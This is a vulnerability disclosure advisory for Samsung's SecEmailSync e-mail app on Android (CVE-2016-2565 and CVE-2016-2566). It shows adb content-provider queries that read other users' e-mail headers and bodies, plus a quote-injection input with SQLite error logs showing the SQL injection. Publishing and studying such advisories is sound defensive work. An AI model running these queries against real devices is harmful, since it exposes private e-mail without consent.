Switch branches/tags
Nothing to show
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
..
Failed to load latest commit information.
README.md

README.md

Exposed provider and SQLi in SecEmailSync

  • Authors: Roberto Paleari (@rpaleari) and Aristide Fattori (@joystick)
  • Samsung ID: SVE-2015-5081
  • ID: CVE-2016-2565 and CVE-2016-2566
  • Notification date: 29/10/2015
  • Release date: 02/02/2016

We identified some vulnerabilities and insecure settings in Samsung proprietary e-mail application, SecEmailSync, distributed with recent Android-based Samsung phones. These vulnerabilities can be exploited by any local application to access a victim's e-mail messages. The attacker App does not require any specific privilege, so the attack is quite stealthy.

Exposed content provider

Recent Samsung Android phones include a proprietary application, named SecEmailSync (package com.samsung.android.email.sync). This App exposes multiple services and content providers, some of which are accessible by any unprivileged local applications.

Among these, we focused on the content provider .homecard.OtherProvider. The relevant manifest entry follows:

<provider android:authorities="com.samsung.android.email.otherprovider" android:exported="true"
android:name="com.samsung.android.email.sync.homecard.OtherProvider"/>

As can be seen from this snippet, this provider is exported and can thus be queried by any other local application, without requiring any specific privilege (CVE-2016-2565).

We investigated the inner workings of this provider and detected it can be abused to access e-mail messages handled by Samsung proprietary application (SecEmail).

As an example, the following ADB command demonstrates how it is possible to query the content provider to extract the e-mails sent by a given sender (in this case, bobby@mysite.it):

$ adb shell content query --uri content://com.samsung.android.email.otherprovider/header --where bobby@mysite.it
Row: 0 timeStamp=1446119267000, subject=Test email, _id=1997

URI content://com.samsung.android.email.otherprovider/body also gives access to the e-mail body:

$ adb shell content query --uri content://com.samsung.android.email.otherprovider/body --where bobby@mysite.it
Row: 0 htmlContent=NULL, textContent=Email body

It is not even required to know the e-mail address of a valid sender, as passing "@" as the e-mail address would suffice to match all the e-mails available.

SQL injection

Even worse, the very same content provider is affected by a SQL injection (SQLi) issue (CVE-2016-2566). As an example, the following query triggers the vulnerability:

$ adb shell content query --uri content://com.samsung.android.email.otherprovider/body --where "test@me'"

When this query is processed, the following messages are recorded in the Android logs (logs have been truncated due to space contraints):

E/DatabaseUtils( 5454): android.database.sqlite.SQLiteException: unrecognized token: "') ORDER BY timeStamp COLLATE NOCASE DESC  LIMIT 10" (code 1): , while compiling: SELECT timeStamp, subject, _id FROM Message WHERE (fromList like '%test@me'%') ORDER BY timeStamp COLLATE NOCASE DESC  LIMIT 10
E/DatabaseUtils( 5454): #################################################################
E/DatabaseUtils( 5454): Error Code : 1 (SQLITE_ERROR)
E/DatabaseUtils( 5454): Caused By : SQL(query) error or missing database.
E/DatabaseUtils( 5454):		(unrecognized token: "') ORDER BY timeStamp COLLATE NOCASE DESC  LIMIT 10" (code 1): , while compiling: SELECT timeStamp, subject, _id FROM Message WHERE (fromList like '%test@me'%') ORDER BY timeStamp COLLATE NOCASE DESC  LIMIT 10)
E/DatabaseUtils( 5454): #################################################################
E/DatabaseUtils( 5454):		at android.database.sqlite.SQLiteConnection.nativePrepareStatement(Native Method)
....
E/DatabaseUtils( 5454):		at com.samsung.android.email.provider.provider.database.AbsEmailProvider.query(AbsEmailProvider.java:1986)

The SQLi can be obviously exploited to extract arbitrary data from the SQL tables managed by the content provider.

Affected devices

We confirm these issues affect the following device models. Other models and firmware versions are probably affected as well, but they were not tested.

  • SM-G920F, build G920FXXU2COH2 (Galaxy S6)

The vulnerabilities discussed in this advisory have already been patched by Samsung, in their January Android Security Update (SMR-JAN-2016).